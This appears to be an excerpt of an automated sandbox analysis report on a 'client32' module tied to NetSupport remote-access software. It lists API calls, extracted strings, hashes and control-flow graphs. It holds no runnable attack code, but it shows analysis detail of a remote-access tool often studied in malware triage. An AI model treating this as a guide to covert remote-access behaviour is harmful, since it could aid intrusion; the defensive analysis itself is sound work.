                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                        • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                        • API String ID: 2201880244-3035937465
                                                                                        • Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                        • Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
                                                                                        • Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                        • Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
                                                                                        APIs
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 111424BA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                        • API String ID: 3535843008-1834795898
                                                                                        • Opcode ID: 1857c41a8e31f6f9d6f5cfaee8ad3ba1a309d52ddc90f248eeedca6f3b402356
                                                                                        • Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
                                                                                        • Opcode Fuzzy Hash: 1857c41a8e31f6f9d6f5cfaee8ad3ba1a309d52ddc90f248eeedca6f3b402356
                                                                                        • Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
                                                                                        • InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
                                                                                        • InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
                                                                                        • InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
                                                                                        • InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
                                                                                        • InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
                                                                                        • _strncpy.LIBCMT ref: 11074E38
                                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
                                                                                        • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11074F43
                                                                                        • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                                        • std::exception::exception.LIBCMT ref: 11075038
                                                                                        • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                        • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                        • API String ID: 703120326-1497550179
                                                                                        • Opcode ID: 0c698a329db76758207e900089e67b2672369198240e6b08767f188b49888f36
                                                                                        • Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
                                                                                        • Opcode Fuzzy Hash: 0c698a329db76758207e900089e67b2672369198240e6b08767f188b49888f36
                                                                                        • Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 3203 11139a70-11139a87 3204 11139eb2-11139ec1 call 11162bb7 3203->3204 3205 11139a8d-11139a94 3203->3205 3205->3204 3206 11139a9a-11139aa1 3205->3206 3206->3204 3208 11139aa7-11139aae 3206->3208 3208->3204 3210 11139ab4-11139abb 3208->3210 3210->3204 3211 11139ac1-11139ad1 call 11145c70 3210->3211 3214 11139ad3-11139ada 3211->3214 3215 11139ae0-11139b27 call 1105e820 call 110642e0 3211->3215 3214->3204 3214->3215 3220 11139b35-11139b5e call 1112d860 3215->3220 3221 11139b29-11139b30 3215->3221 3224 11139b64-11139b67 3220->3224 3225 11139c1a-11139c21 call 110ea860 3220->3225 3221->3220 3226 11139b75 3224->3226 3227 11139b69-11139b6e 3224->3227 3234 11139c23-11139c3e call 1105e820 3225->3234 3235 11139c40-11139c4f PostMessageA 3225->3235 3230 11139b7b-11139b86 3226->3230 3227->3226 3229 11139b70-11139b73 3227->3229 3229->3230 3232 11139b88 3230->3232 3233 11139b8d-11139ba5 3230->3233 3232->3233 3245 11139c01-11139c08 3233->3245 3246 11139ba7-11139bad 3233->3246 3234->3235 3236 11139c55-11139c5a 3234->3236 3235->3236 3239 11139c65-11139c69 3236->3239 3240 11139c5c-11139c60 call 11110000 3236->3240 3243 11139c6b-11139c73 3239->3243 3244 11139c8d-11139cb6 call 11131320 call 11147ad0 call 1112da60 call 11162777 3239->3244 3240->3239 3249 11139c75-11139c8b 3243->3249 3250 11139cb9-11139cc1 3243->3250 3244->3250 3247 11139c17 3245->3247 3248 11139c0a-11139c11 call 11132990 3245->3248 3252 11139baf-11139bb4 3246->3252 3253 11139bfc 3246->3253 3247->3225 3248->3247 3266 11139c13 3248->3266 3249->3250 3254 11139cc3-11139cdd call 11162777 call 11162bb7 3250->3254 3255 11139cde-11139d04 call 11143a50 call 11147af0 SetWindowTextA 3250->3255 3252->3253 3258 11139bb6-11139bbb 3252->3258 3253->3245 3279 11139d10-11139d29 call 11162777 * 2 3255->3279 3280 11139d06-11139d0d call 111361c0 3255->3280 3258->3253 3264 11139bbd-11139bdf 3258->3264 3264->3253 3274 11139be1-11139bf0 call 11146710 3264->3274 3266->3247 3286 11139bf2-11139bfa 3274->3286 3290 11139d2b-11139d2f 3279->3290 3291 11139d6e-11139d72 3279->3291 3280->3279 3286->3253 3286->3286 3294 11139d43-11139d4a 3290->3294 3295 11139d31-11139d41 call 111361c0 3290->3295 3292 11139d78-11139d7a 3291->3292 3293 11139e3c-11139e3e 3291->3293 3296 11139d9c-11139da9 call 110f8b70 3292->3296 3297 11139d7c-11139d7e 3292->3297 3299 11139e40-11139e42 3293->3299 3300 11139e5d-11139e6a call 110f8b70 3293->3300 3301 11139d64 3294->3301 3302 11139d4c-11139d61 call 11132120 3294->3302 3295->3294 3295->3302 3318 11139eaf-11139eb1 3296->3318 3320 11139daf-11139dc0 IsWindowVisible 3296->3320 3297->3296 3303 11139d80-11139d90 call 111361c0 3297->3303 3307 11139e53-11139e5a call 11132120 3299->3307 3308 11139e44-11139e4e call 111361c0 3299->3308 3300->3318 3319 11139e6c-11139e7c IsWindowVisible 3300->3319 3301->3291 3302->3301 3303->3296 3322 11139d92-11139d99 call 11132120 3303->3322 3307->3300 3308->3307 3318->3204 3319->3318 3323 11139e7e-11139e89 IsWindowVisible 3319->3323 3320->3318 3324 11139dc6-11139dd6 call 11145c70 3320->3324 3322->3296 3323->3318 3326 11139e8b-11139ead EnableWindow call 11132120 EnableWindow 3323->3326 3324->3318 3332 11139ddc-11139df4 GetForegroundWindow IsWindowVisible 3324->3332 3326->3318 3333 11139e01-11139e0d call 11132120 3332->3333 3334 11139df6-11139dff EnableWindow 3332->3334 3337 11139e0f-11139e15 3333->3337 3338 11139e1e-11139e3b EnableWindow call 11162bb7 3333->3338 3334->3333 3337->3338 3339 11139e17-11139e18 SetForegroundWindow 3337->3339 3339->3338
                                                                                        APIs
                                                                                          • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,750A94D8), ref: 11145CA0
                                                                                          • Part of subcall function 11145C70: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                          • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                          • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                        • PostMessageA.USER32 ref: 11139C4F
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • SetWindowTextA.USER32(0001033C,00000000), ref: 11139CF7
                                                                                        • IsWindowVisible.USER32(0001033C), ref: 11139DBC
                                                                                        • GetForegroundWindow.USER32 ref: 11139DDC
                                                                                        • IsWindowVisible.USER32(0001033C), ref: 11139DEA
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                                        • EnableWindow.USER32(0001033C,00000001), ref: 11139E27
                                                                                        • IsWindowVisible.USER32(0001033C), ref: 11139E78
                                                                                        • IsWindowVisible.USER32(0001033C), ref: 11139E85
                                                                                        • EnableWindow.USER32(0001033C,00000000), ref: 11139E99
                                                                                        • EnableWindow.USER32(0001033C,00000000), ref: 11139DFF
                                                                                          • Part of subcall function 11132120: ShowWindow.USER32(0001033C,00000000), ref: 11132144
                                                                                        • EnableWindow.USER32(0001033C,00000001), ref: 11139EAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                        • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                        • API String ID: 3453649892-3803836183
                                                                                        • Opcode ID: a88fc41a469019d1400cb27a4983c8b03ac4313f50edbdc2c1f6cd16a0585786
                                                                                        • Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
                                                                                        • Opcode Fuzzy Hash: a88fc41a469019d1400cb27a4983c8b03ac4313f50edbdc2c1f6cd16a0585786
                                                                                        • Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 3342 110305f5-110305fc 3343 11030600-11030610 3342->3343 3343->3343 3344 11030612-11030619 3343->3344 3345 1103061b-1103062d 3344->3345 3346 1103065d 3344->3346 3350 11030650-11030657 3345->3350 3351 1103062f-1103064e wsprintfA 3345->3351 3347 11030662-1103067d call 1105e820 3346->3347 3353 11030703-1103071d call 1102a520 call 11139600 call 11145c70 3347->3353 3354 11030683-11030693 call 11145c70 3347->3354 3350->3346 3350->3353 3351->3347 3367 1103071f-11030726 3353->3367 3368 1103075e-11030765 3353->3368 3354->3353 3359 11030695-110306ce call 1105e820 call 111101b0 3354->3359 3372 110306e1 3359->3372 3373 110306d0-110306df call 1109dd30 3359->3373 3370 11030776-110307a1 call 110286c0 call 1102d190 PostMessageA 3367->3370 3371 11030728-1103072f 3367->3371 3368->3370 3374 11030767-1103076f call 11143a20 3368->3374 3390 110307a3-110307ad PostMessageA 3370->3390 3391 110307af-110307ca 3370->3391 3371->3374 3376 11030731-11030756 call 1105e820 3371->3376 3377 110306e3-110306fe call 1109e5b0 3372->3377 3373->3377 3374->3370 3387 11030771 call 1102d830 3374->3387 3376->3368 3377->3353 3387->3370 3390->3391 3393 110307d8-110307f3 3391->3393 3394 110307cc-110307d6 PostMessageA 3391->3394 3396 11030801-1103081f call 11147060 call 11027810 call 1102d900 3393->3396 3397 110307f5-110307ff PostMessageA 3393->3397 3394->3393 3403 1103081f call 1102d900 3396->3403 3397->3396
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 11030645
                                                                                        • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostwsprintf
                                                                                        • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                                        • API String ID: 875889313-3431570279
                                                                                        • Opcode ID: 308953ceba3eb16916e060fbe0517094e63593472d00720067f2536b78ae3a1c
                                                                                        • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                                        • Opcode Fuzzy Hash: 308953ceba3eb16916e060fbe0517094e63593472d00720067f2536b78ae3a1c
                                                                                        • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 3405 110310d5-110310df GetNativeSystemInfo 3406 110310e1-110310e6 3405->3406 3407 110310ed-11031106 3405->3407 3406->3407 3409 11031202-11031209 3407->3409 3410 1103110c-11031114 3407->3410 3413 11031220 3409->3413 3414 1103120b-1103121b 3409->3414 3411 11031116-1103111d 3410->3411 3412 1103116d-11031170 3410->3412 3415 1103111f-11031129 3411->3415 3416 1103118c-1103119c 3411->3416 3418 11031172-11031178 3412->3418 3419 1103119e-110311a1 3412->3419 3420 110312db-1103131f GetStockObject GetObjectA 3413->3420 3417 1103112f-1103113f 3414->3417 3415->3417 3416->3417 3431 11031081-1103109f call 111101b0 call 11109bc0 3417->3431 3432 11031145-11031168 call 111101b0 call 110fae60 3417->3432 3418->3416 3421 1103117a-1103118a 3418->3421 3423 110311a3-110311aa 3419->3423 3424 110311d0-110311d3 3419->3424 3426 11031321 3420->3426 3427 1103132b-11031497 SetErrorMode * 2 call 111101b0 call 11028980 call 111101b0 call 11028980 InterlockedExchange call 111101b0 call 1108a880 GetACP call 11163f93 call 111663a3 call 11143770 call 11143780 call 111101b0 call 11061aa0 3420->3427 3421->3417 3428 110311c1 3423->3428 3429 110311ac-110311bc 3423->3429 3424->3409 3430 110311d5-110311dc 3424->3430 3426->3427 3479 11031499 3427->3479 3480 1103149f-110314a5 3427->3480 3428->3424 3429->3417 3435 110311f3 3430->3435 3436 110311de-110311ee 3430->3436 3448 110310a4-110312d6 3431->3448 3432->3420 3435->3409 3436->3417 3448->3420 3479->3480 3481 110314e1-110315f6 call 110ccc90 call 111101b0 call 11125d40 call 11114fb0 call 111101b0 call 11088b30 call 111101b0 call 1105cdb0 call 11110270 call 1105d1a0 call 11027810 call 1100d620 3480->3481 3482 110314a7-110314dc call 111101b0 call 11061710 3480->3482 3523 11031749-11031776 call 110edb10 call 11162bb7 3481->3523 3524 110315fc-11031610 call 1100d330 call 11147060 3481->3524 3482->3481 3524->3523
                                                                                        APIs
                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                                        • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                        • InterlockedExchange.KERNEL32(00348A70,00001388,?,?,?,?,?,?,00000050), ref: 110313BA
                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                                        • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                        • API String ID: 1428277488-3745656997
                                                                                        • Opcode ID: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
                                                                                        • Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
                                                                                        • Opcode Fuzzy Hash: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
                                                                                        • Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
                                                                                        APIs
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                        • InterlockedExchange.KERNEL32(00348A70,00001388,?,?,?,?,?,?,00000050), ref: 110313BA
                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                        • _sprintf.LIBCMT ref: 11031401
                                                                                        • _setlocale.LIBCMT ref: 1103140B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                                        • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                        • API String ID: 4242130455-3745656997
                                                                                        • Opcode ID: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
                                                                                        • Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
                                                                                        • Opcode Fuzzy Hash: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
                                                                                        • Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                          • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                        • wsprintfA.USER32 ref: 11028814
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                                        • wsprintfA.USER32 ref: 11028891
                                                                                        • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                                        • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
